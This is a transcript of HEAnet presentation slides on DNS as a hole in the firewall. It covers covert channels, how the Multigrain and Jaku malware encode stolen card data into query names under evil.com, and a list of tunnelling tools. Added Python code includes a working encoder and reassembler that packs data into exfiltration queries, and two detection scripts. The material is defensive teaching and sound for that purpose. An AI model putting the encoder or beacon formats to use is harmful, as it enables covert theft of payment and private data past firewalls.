DNS – A HOLE IN YOUR FIREWALL (HEAnet)

Posted on 28-Jul-2020

TRANSCRIPT

Page 1:

DNS – A HOLE IN YOUR FIREWALL
[email protected] | [email protected]

Page 2:

THE PROBLEM

SECURITY

Page 3:

CYBER SECURITY LANDSCAPE

[Chart: Technology Reliance/Complexity (y-axis) rising over time (x-axis), with the security model of each era]

1980s: Perimeter Security
1990s (www): Layered Security
2000s (social media): Inclusion & Exclusion Security
2016+ (IoT): Assumed state of Compromise

Page 4:

ATTACK CHAIN - ADVANCED PERSISTENT THREAT (APT)

Intel gathering -> Point of entry -> Compromise -> Command & Control (C2) -> Lateral Movement -> Asset/Data Recovery -> Data Exfiltration

Covert Communication

Page 5:

COVERT CHANNELS & NETWORK STEGANOGRAPHY

Wax tablets, 5th century BC. Micro dots, WWII. Image steganography – changing least significant bits.

Page 6:

COVERT CHANNELS & NETWORK STEGANOGRAPHY

A DNS name on the wire is a sequence of length byte (LL) plus label (LN) pairs, closed by a null byte (NL). A short three-label name therefore costs:

LL (1) + LN (3) + LL (1) + LN (3) + LL (1) + LN (2) + NL (1) = 12 bytes

Slack space under the 255-byte name limit = 243 bytes

Track 1 = 79 bytes, Track 2 = 40 bytes: a full card track fits in the slack of a single query name.

Page 7:

WHY SHOULD WE BE CONCERNED?

Focus on other protocols (HTTP, FTP) means less time looking at DNS traffic.

DNS is ubiquitous. In order to do good or bad things on the internet you need DNS.

91.3% of malware uses DNS in attacks in some shape or form.

68% of orgs don't monitor recursive DNS.

Page 8:

HOW DOES IT WORK?

[Diagram: Compromised Host (holding Private Data) -> Firewall -> DNS -> Authoritative Nameserver (Evil Server)]

The compromised host never talks to the evil server directly: it asks the local DNS for a name under the attacker's domain, the firewall lets DNS through, and the resolver delivers the question, data and all, to the attacker's authoritative nameserver.

Page 9:

Malware known to use DNS - MULTIGRAIN

Variant of point of sale (POS) malware known as NewPosThings. Highly targeted, digitally signed and exfiltrates payment data over DNS. Engineered to target a specific POS process, multi.exe. If multi.exe does not exist the malware will delete itself.

Beacon: hashed volume serial number + last five bytes of MAC, base32 encoded together with computer name and version number:

install.<base32 encoded data>.evil.com

Track 2 payment info is scraped from memory and stored in a buffer. The malware checks the buffer every 5 mins, encrypts the data with 1024-bit RSA and base32 encodes it within a DNS query:

log.<base32 encoded track2 data>.evil.com

DNS query every ~5 mins

Page 10:

Malware known to use DNS – JAKU BOTNET

Specific targets: NGOs, engineering companies, academic institutions, scientists and government employees. Victims are spread across the globe but primarily in S. Korea and Japan. Sophisticated and resilient, with different command and control approaches.

pWrpqMoqqipJiiwGBgaoxueIyMaG56g.eq = "+MICROSOFT_000C29DB249C", which is '+' followed by computer name and MAC address.

install.<base32 encoded data>.evil.com

Translates a returned CNAME of LS4.com to 'go' and looks for command parameters. For example, LS4.test.com would be 'go' with a parameter of test.

LS4.test.com

<base32 encoded data>.evil.com

DNS query every ~2 mins

Page 11:

NEEDLE IN A HAYSTACK - WHAT TO LOOK FOR?

Encoded payloads next to legitimate but odd-looking CDN and analytics hostnames; by eye they are hard to tell apart.

x--344--umnxifvfmxvzbzdzxvehf-3jwl7tchv-xgv3khzlqwnz-q5rizf2i.co.uk
ドメイン.テスト
VGhpcyBpcyBhIHNlY3JldCBtZXNzYWdlIGZvciB5b3U=.cvrtns.mooo.com
01110100 01101000 01101001 01101110 01101011 01100111 01100101 01100101 01101011.co.uk
3---sn-xpgjvh-q0ce.googlevideo.com.
ew5mz7jl6k.search.serialssolutions.com.
s-static.ak.facebook.com.
0xdabbad00.com.
p4-heybcnjawql6y-2lhkfkmkqfbb7eev-if-v6exp3-v4.metric.gstatic.com.
bstatic-a.akamaihd.net.
fbcdn-profile-a.akamaihd.net.

Page 12:

EXFILTRATION TESTING

• IODINE - http://code.kryo.se/iodine/

• OzymanDNS - https://dankaminsky.com/2004/07/29/51/

• DNSCat - https://wiki.skullsecurity.org/Dnscat

• CobaltStrike - https://www.cobaltstrike.com/

• Roll your own version in Python; it's not that hard.

• Use your Linux command line tools and some scripting (xxd, base64, dig).
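Worked example of the "roll your own" point, added here and not taken from the deck or from any of the tools listed above. It encodes a payload into query names of the shape the Multigrain and Jaku slides show (log.<base32>.evil.com, with a sequence number added so the receiver can reorder), packs each name up to the 63-byte label and 255-byte name limits of RFC 1035 that the covert-channel slide's slack arithmetic rests on, and reassembles the names as the attacker's authoritative server would. evil.com, the log tag and the Track-2-like string are placeholders; nothing is sent on the network.

```python
"""Roll-your-own DNS exfiltration encoding.

Added example for this slide; not code from the HEAnet deck nor from iodine,
OzymanDNS, dnscat or Cobalt Strike.  'evil.com' and the 'log' tag are
placeholders.  Nothing here sends a packet."""
import base64

MAX_LABEL = 63    # longest label RFC 1035 allows
MAX_NAME = 255    # wire-format name length incl. length bytes and final NUL


def wire_length(name):
    """Bytes a name occupies in a DNS message: one length byte per label, the
    label bytes, and the terminating zero byte.  'evil.com' -> 1+4+1+3+1 = 10."""
    labels = [l for l in name.rstrip(".").split(".") if l]
    return sum(1 + len(l) for l in labels) + 1


def slack(name):
    """Bytes still free under the 255-byte limit (the deck's 243 bytes for a
    12-byte name)."""
    return MAX_NAME - wire_length(name)


def build_queries(tag, data, domain):
    """Split data into query names <tag><seq>.<b32>[.<b32>...].<domain>, each
    within the label/name limits.  Base32 is used because DNS names are
    case-insensitive; '=' padding is dropped here and restored on decode."""
    b32 = base64.b32encode(data).decode("ascii").rstrip("=").lower()
    queries, seq, pos = [], 0, 0
    while pos < len(b32):
        head = f"{tag}{seq}"
        used = wire_length(f"{head}.{domain}")   # fixed part, NUL included
        labels = []
        # add data labels while at least one data byte plus its length byte fits
        while pos < len(b32) and used + 2 <= MAX_NAME:
            take = min(MAX_LABEL, len(b32) - pos, MAX_NAME - used - 1)
            labels.append(b32[pos:pos + take])
            used += 1 + take
            pos += take
        queries.append(".".join([head, *labels, domain]))
        seq += 1
    return queries


def reassemble(tag, queries, domain):
    """Receiver side (what the 'evil' authoritative server does): keep queries
    under our domain, order them by sequence number, join the base32 labels
    and decode.  Retries of the same seq simply overwrite the same chunk."""
    suffix = "." + domain
    chunks = {}
    for q in queries:
        if not q.lower().endswith(suffix.lower()):
            continue
        head, _, rest = q[:-len(suffix)].partition(".")
        if not (head.startswith(tag) and head[len(tag):].isdigit()):
            continue
        chunks[int(head[len(tag):])] = rest.replace(".", "")
    b32 = "".join(chunks[k] for k in sorted(chunks)).upper()
    b32 += "=" * (-len(b32) % 8)               # restore padding
    return base64.b32decode(b32)


def max_payload_per_query(tag, domain):
    """Raw bytes one query can carry: count the base32 characters that fit
    around the fixed labels, then convert at 5 bits per character."""
    used = wire_length(f"{tag}0.{domain}")
    room = MAX_NAME - used
    full, rest = divmod(room, MAX_LABEL + 1)
    chars = full * MAX_LABEL + max(0, rest - 1)
    return chars * 5 // 8


if __name__ == "__main__":
    # Constructed Track-2-like record; not a real card.
    track2 = b";4111111111111111=25121011000012345678?"
    qs = build_queries("log", track2, "evil.com")
    for q in qs:
        print(wire_length(q), q)
    assert reassemble("log", qs, "evil.com") == track2
```

The slack figures on the covert-channel slide fall out of wire_length(): a 12-byte name leaves 243 bytes, and a log<seq>.evil.com wrapper still leaves room for 147 raw bytes per query, so a 40-byte Track 2 record never needs more than one lookup. Sending for real is a matter of handing each name to dig or a resolver library, which is why detection should key on the question names and their rate rather than on answers: exfiltration only needs the question to reach the authoritative server.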

Page 13:

TECHNIQUES FOR DETECTION

STATISTICAL ANALYSIS: Use of character frequency analysis along with n-gram and entropy analysis.

TRAFFIC ANALYSIS: Know your network. Create a baseline for anomaly detection.

ARTIFICIAL INTELLIGENCE: Machine learning techniques can be used to spot patterns in traffic and spot anomalies.

LOG DNS TRAFFIC
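Added example (not the deck's code) of the statistical techniques above, run over the names from the needle-in-a-haystack slide: Shannon entropy and digit ratio of the longest label, its length, and the share of its bigrams never seen in a small benign label corpus. The corpus, the thresholds and the extra hex-encoded sample are assumptions for illustration; a real deployment derives corpus and thresholds from its own baseline.

```python
"""Statistical scoring of query names: entropy, character-class frequency,
label length and a bigram check against a small benign corpus.

Added example for this slide, not code from the HEAnet deck.  Thresholds and
the benign corpus are assumptions chosen for illustration."""
import math
from collections import Counter

# Constructed benign corpus: typical hostname labels, including the legitimate
# CDN-style names on the deck's slide.  Replace with labels from your own logs.
BENIGN_LABELS = [
    "www", "mail", "static", "cdn", "login", "api", "images", "assets", "news",
    "shop", "blog", "web", "secure", "portal", "s-static", "ak", "facebook",
    "fbcdn-profile-a", "bstatic-a", "akamaihd", "google", "googlevideo",
    "gstatic", "metric", "search", "office", "support", "docs", "maps",
    "update", "download", "media", "video", "photos", "smtp", "imap", "vpn",
    "ns1", "ns2", "serialssolutions",
]

# Thresholds (assumed; tune against your baseline)
MAX_ENTROPY = 3.5      # bits per char; English-like labels sit around 2-3
MAX_DIGIT_RATIO = 0.5  # hex/binary/base32 blobs are digit-heavy
MAX_LABEL_LEN = 40     # legitimate labels are rarely this long (63 is the hard limit)
MAX_UNSEEN = 0.6       # fraction of bigrams never seen in the benign corpus


def to_ascii(name):
    """Normalise: IDN labels to punycode (what actually crosses the wire),
    lowercase because DNS is case-insensitive, strip the trailing dot."""
    if not name.isascii():
        name = name.encode("idna").decode("ascii")
    return name.lower().rstrip(".")


def shannon_entropy(s):
    """Bits per character of the empirical character distribution."""
    if not s:
        return 0.0
    counts = Counter(s)
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def digit_ratio(s):
    return sum(ch.isdigit() for ch in s) / len(s) if s else 0.0


def bigrams(s):
    return [s[i:i + 2] for i in range(len(s) - 1)]


BENIGN_BIGRAMS = Counter(b for label in BENIGN_LABELS for b in bigrams(label))


def unseen_bigram_ratio(s):
    """Share of the label's bigrams that never occur in the benign corpus."""
    bg = bigrams(s)
    if not bg:
        return 0.0
    return sum(b not in BENIGN_BIGRAMS for b in bg) / len(bg)


def score(name):
    """Score the longest label (where an encoded payload lands) and say why."""
    label = max(to_ascii(name).split("."), key=len)
    f = {
        "label": label,
        "label_len": len(label),
        "entropy": round(shannon_entropy(label), 3),
        "digit_ratio": round(digit_ratio(label), 3),
        "unseen_bigrams": round(unseen_bigram_ratio(label), 3),
    }
    reasons = []
    if f["entropy"] > MAX_ENTROPY:
        reasons.append("high entropy")
    if f["digit_ratio"] > MAX_DIGIT_RATIO:
        reasons.append("digit-heavy")
    if f["label_len"] > MAX_LABEL_LEN:
        reasons.append("long label")
    if f["unseen_bigrams"] > MAX_UNSEEN:
        reasons.append("unfamiliar bigrams")
    f["reasons"] = reasons
    f["suspect"] = bool(reasons)
    return f


if __name__ == "__main__":
    samples = [  # the deck's slide, plus one constructed xxd-style hex label at the end
        "x--344--umnxifvfmxvzbzdzxvehf-3jwl7tchv-xgv3khzlqwnz-q5rizf2i.co.uk",
        "ドメイン.テスト",
        "VGhpcyBpcyBhIHNlY3JldCBtZXNzYWdlIGZvciB5b3U=.cvrtns.mooo.com",
        "3---sn-xpgjvh-q0ce.googlevideo.com.",
        "ew5mz7jl6k.search.serialssolutions.com.",
        "s-static.ak.facebook.com.",
        "0xdabbad00.com.",
        "p4-heybcnjawql6y-2lhkfkmkqfbb7eev-if-v6exp3-v4.metric.gstatic.com.",
        "bstatic-a.akamaihd.net.",
        "fbcdn-profile-a.akamaihd.net.",
        "4d616c77617265207472616e73666572.cvrtns.mooo.com",
    ]
    for s in samples:
        f = score(s)
        print(f"{'SUSPECT' if f['suspect'] else 'ok     '} len={f['label_len']:2d} "
              f"H={f['entropy']:.2f} dig={f['digit_ratio']:.2f} "
              f"unseen={f['unseen_bigrams']:.2f} {', '.join(f['reasons'])} | {s}")
```

Run stand-alone it prints one line per sample. Entropy and length catch the base64 name and the digit ratio catches the hex one, but the gstatic name is flagged for length and the googlevideo and 0xdabbad00.com names for unfamiliar bigrams, which is the slide's point: per-name statistics produce candidates, and it takes the baseline from traffic analysis to decide.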

Page 14:

DNS TRAFFIC LOGGING APPROACHES

TURN ON LOGGING: Periodically turn on logging on DNS servers. May be costly but worth it to create a baseline.

SNIFF PACKETS: Use tools like Wireshark to sniff packets off the wire without affecting the existing network architecture.

PASSIVE DNS: Implement a passive DNS server and contribute to a wider intelligence community.

DNS INTELLIGENCE
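Added example (not from the deck) for the "know your network, create a baseline" point on the previous slide and the "turn on logging" point on this one: it parses BIND 9-style query log lines, profiles each registered domain (how often its names repeat) and each client (query rate and share of TXT/NULL/CNAME lookups), and lists domains outside a baseline whose names almost never repeat. The log lines, addresses, timestamps and evil.com are all constructed for the example; the two-level suffix set is a stand-in for a real public-suffix list.

```python
"""Traffic baseline from BIND-style query logs: per-domain name churn and
per-client query rate and record-type mix.

Added example for these slides, not code from the HEAnet deck.  Log lines
below are constructed; the line format mirrors BIND 9 'querylog' output."""
import re
from collections import Counter, defaultdict
from datetime import datetime

# Example line (newer BIND versions insert "@0x..." before the client address;
# the regex allows it):
# 28-Jul-2020 10:00:01.000 client 10.0.0.9#51234 (x.evil.com): query: x.evil.com IN TXT + (192.0.2.53)
LOG_RE = re.compile(
    r"^(?P<ts>\d{2}-\w{3}-\d{4} \d{2}:\d{2}:\d{2}\.\d{3}) client (?:@\S+ )?"
    r"(?P<client>[0-9a-fA-F.:]+)#\d+ \([^)]*\): query: (?P<qname>\S+) IN (?P<qtype>\S+)"
)

# Stand-in for a public-suffix list; use a real one in production.
TWO_LEVEL_SUFFIXES = {"co.uk", "ac.uk", "com.au"}


def registered_domain(qname):
    labels = qname.lower().rstrip(".").split(".")
    keep = 3 if ".".join(labels[-2:]) in TWO_LEVEL_SUFFIXES else 2
    return ".".join(labels[-keep:])


def parse(lines):
    """Return (timestamp, client, qname, qtype) for each query line."""
    recs = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue   # not a query entry (zone loads, errors, ...)
        ts = datetime.strptime(m["ts"], "%d-%b-%Y %H:%M:%S.%f")
        recs.append((ts, m["client"], m["qname"].lower().rstrip("."), m["qtype"]))
    return recs


def domain_profile(recs):
    """Per registered domain: query count, distinct names, mean name length.
    Normal traffic re-asks the same few names; encoded payload never repeats."""
    by_dom = defaultdict(list)
    for _, _, qname, _ in recs:
        by_dom[registered_domain(qname)].append(qname)
    return {
        dom: {
            "queries": len(names),
            "unique": len(set(names)),
            "unique_ratio": len(set(names)) / len(names),
            "mean_len": sum(map(len, names)) / len(names),
        }
        for dom, names in by_dom.items()
    }


def client_profile(recs):
    """Per client: queries per minute over its active window and the share of
    TXT/NULL/CNAME lookups, the types tunnelling tools use to carry answers."""
    by_client = defaultdict(list)
    for ts, client, _, qtype in recs:
        by_client[client].append((ts, qtype))
    prof = {}
    for client, items in by_client.items():
        times = [t for t, _ in items]
        minutes = max((max(times) - min(times)).total_seconds() / 60, 1 / 60)
        types = Counter(q for _, q in items)
        prof[client] = {
            "queries": len(items),
            "qpm": len(items) / minutes,
            "bulk_type_ratio": sum(types[t] for t in ("TXT", "NULL", "CNAME")) / len(items),
        }
    return prof


def anomalies(prof, baseline_domains, min_queries=5, min_unique_ratio=0.8):
    """Domains absent from the baseline whose names almost never repeat."""
    return sorted(
        dom for dom, p in prof.items()
        if dom not in baseline_domains
        and p["queries"] >= min_queries
        and p["unique_ratio"] >= min_unique_ratio
    )


def _line(ts, client, qname, qtype):
    """Build one constructed BIND-style query log line."""
    return f"{ts} client {client}#53412 ({qname}): query: {qname} IN {qtype} + (192.0.2.53)"


# Domains seen during the baseline window (constructed).
BASELINE_DOMAINS = {"google.com", "facebook.com", "heanet.ie", "akamaihd.net"}

# Constructed log: a normal workstation, one non-query line, and a host that
# asks for a fresh base32-looking label under evil.com every two minutes.
SAMPLE_LOG = [
    _line("28-Jul-2020 10:00:00.000", "10.0.0.5", "www.google.com", "A"),
    _line("28-Jul-2020 10:00:02.000", "10.0.0.5", "www.google.com", "AAAA"),
    _line("28-Jul-2020 10:00:05.000", "10.0.0.5", "s-static.ak.facebook.com", "A"),
    _line("28-Jul-2020 10:00:09.000", "10.0.0.5", "mail.heanet.ie", "A"),
    _line("28-Jul-2020 10:00:30.000", "10.0.0.5", "www.google.com", "A"),
    "28-Jul-2020 10:00:31.000 general: info: zone heanet.ie/IN: loaded serial 1",
]
_B32 = ["gezdgnbvgy3tqojq", "mfrggzdfmztwq2lk", "nbswy3dpfqqho33s",
        "onqw45dfoqqgk3tu", "ojsxg5lmorqxg4tz", "pfqw443fmfrwwzlb"]
for i, chunk in enumerate(_B32):
    SAMPLE_LOG.append(_line(f"28-Jul-2020 10:{2 * i:02d}:00.000", "10.0.0.9",
                            f"log.{chunk}.evil.com", "TXT"))

if __name__ == "__main__":
    recs = parse(SAMPLE_LOG)
    for dom, p in domain_profile(recs).items():
        print(f"{dom:20s} queries={p['queries']:2d} unique_ratio={p['unique_ratio']:.2f}")
    for client, p in client_profile(recs).items():
        print(f"{client:10s} qpm={p['qpm']:.1f} bulk_type_ratio={p['bulk_type_ratio']:.2f}")
    print("anomalies:", anomalies(domain_profile(recs), BASELINE_DOMAINS))
```

The same records can come from a capture (tshark -T fields -e dns.qry.name) or a passive DNS feed; only parse() changes. The repeat-rate signal is indifferent to the encoding the malware picked, which per-name statistics are not, and it is cheap enough to compute over a whole day of logs, so it is the natural first pass before any machine-learning model.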

Page 15:

IN SUMMARY

• DNS is ubiquitous; almost all internet traffic is dependent on it.

• DNS has characteristics that are very useful to malicious actors.

• Malware uses DNS for C2 and data exfiltration.

• Approaches can be taken to mitigate, but we have to log DNS traffic.

• Opportunity to contribute to the wider cyber security intelligence community by implementing passive DNS.

• Organisations such as DNS-OARC can facilitate sharing of intel.

• If you are interested in logging DNS, sharing DNS data or have questions, come and speak to us.

Page 16:

QUESTIONS

DNS ?